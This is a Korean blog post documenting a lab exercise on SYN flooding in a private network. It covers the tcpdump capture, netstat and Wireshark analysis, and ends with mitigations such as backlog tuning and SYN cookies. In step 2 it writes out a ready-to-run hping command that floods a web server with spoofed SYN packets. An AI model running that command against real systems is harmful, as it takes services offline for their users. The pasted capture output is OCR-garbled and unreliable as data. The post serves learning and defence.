2020. 7. 14.

[Network] syn flooding 변경 확인


    1. 구성과 계획
    • 네트워크 구성도
    피해자 - 192.168.10.113/00:0c:29:a9-51-06
    감시자 att6 - 192.168.10.149/00:0C:29:C6:9A:42
    공격자 att5 - 192.168.10.148/00:0C:29:5D:87:05

    • 과정 정리
    step1. att6 tcpdump 캡쳐
    step2. att5 hping 공격 실행
    setp3. web153 netstat 확인
    step4. wireshark 캡쳐본 분석

    1. 관련내용정리
    syn flooding : 짧은 시간에 많은 양의 SYN 패킷을 보내 SYN Received 상태로 ACK패킷을 기다리는 백로그 큐를 채워 웹서버 자원을 고갈 시키는 공격
    netstat : 전송 제어 프로토콜. 라우팅 테이블. 네트워크 연결을 보여주는 명령

    1. 실습과정
    step1. att6 tcpdump 캡쳐
    tcpdump -xX -w synflooding.cap
    step2. att5 hping 공격 실행ll
    hping -S --rand-source 192.168.10.113 -d 1 --flood -p 80
    step3. web113 netstat 확인
    netstat -an | grep SYN_RECV
    [ root@tr2 tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tcp tr21 # o o o o o o o o o o o o o o o o o o o o netstat I grep SYN o o o o o o o o o o o o o o o o o o o o 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 192. 168. 10. 113: 80 RECV 109. 25. 234. 234: 2962 52. 28. 62. 124: 3092 100. 184. 120. 12: 3122 57. 20. 71. 164: 2984 221. 89. 184. 167: 3197 124. 34. 13. 198: 3031 108. 47. 101. 73: 3227 60. 8. 31. gg: 3104 177. 34. 60. 97: 3017 15. 103. 175. 30: 3211 210. 234. 146. 51: 3108 66. 188. 106. 67: 3183 31. 26. 234. 23g: 3086 203. 89. 72. 46: 3164 19. 255. 34. 101: 2995 124. 191. 239. 220: 3177 90. 72. 75. 91: 2996 250. 119. 184. 148: 2967 194. 214. 146. 15g: 3101 99. 210. 210. 22g: 3042 SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN SYN RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV RECV
    SYN_RECV으로 연결을 유지하면서 백로그큐를 채우고잇는것을 수있다.

    step4. wireshark 캡쳐본 분석
    wireshark on
    • filtering : ip.addr == 192.168.10.113
    57.20. 71.164 192. 168.10. 113 60.214.19.38 192. 168.10. 113 21.226. 21.227 192. 168.10. 113 43. 73.29. 1Ø8 192. 168.10. 113 207.33. 28.148 192. 168.10. 113 124. 73 . 184. 88 192. 168.10. 113 82.129. 188.93 192. 168.10. 113 82. 226. 151. 211 192. 168.10. 113 82. 186.6. 217 192. 168.10. 113 219 .19 .47. 239 192. 168.10. 113 165 .97 . 244. 218 192. 168.10. 113 19. 255 .34. 192. 168.10. 113 TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 60 2984 60 2985 60 2986 60 2987 60 2988 60 2989 60 2990 60 2991 60 2992 60 2993 60 2994 60 2995 [SYM] [SYM] [SYM] [SYM] [SYM] [SYM] [SYM] [SYM] [SYM] [SYM] [SYM] [SYM] Seq=Ø Seq=Ø Seq=Ø Seq=Ø Seq=Ø Seq=Ø Seq=Ø Seq=Ø Seq=Ø Seq=Ø Seq=Ø Seq=Ø Win Win Win Win Win Win Win Win Win Win Win Win =512 =512 =512 =512 =512 =512 =512 =512 =512 =512 =512 =512 Len Len Len Len Len Len Len Len Len Len Len Len [TCP [TCP [TCP [TCP [TCP [TCP [TCP [TCP [TCP [TCP [TCP [TCP segment segment segment segment segment segment segment segment segment segment segment segment of of of of of of of of of of of of a reassembled a reassembled a reassembled a reassembled a reassembled a reassembled a reassembled a reassembled a reassembled a reassembled a reassembled a reassembled
    SYN 옵션을 넣어 보낸것을 확인 있다. 크기도 1 주어 시퀀스넘버가 1 늘어난다는것을 있다.

    1. 결론
    SYN flooding 공격은 정말 많은 양의 좀비PC 이용하면 막을 방법이 없다. 하지만 감소시킬 있다.
    방지방안은 네가지가 있다.
    • 백로그큐가 차지않도록 대기 시간을 줄인다.
    • 백로그큐의 크기를 늘린다.
      • net.ipv4.tcp_max_syn_backlog = 1024
    • Syn cookie 이용하여 시퀀스 넘버를 보내고 syn_cookie 포함된 값을 클라이언트로부터 받아서 인증을 한다.
      • net.ipv4.tcp_syncookies = 1

시간:
라벨: ,

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)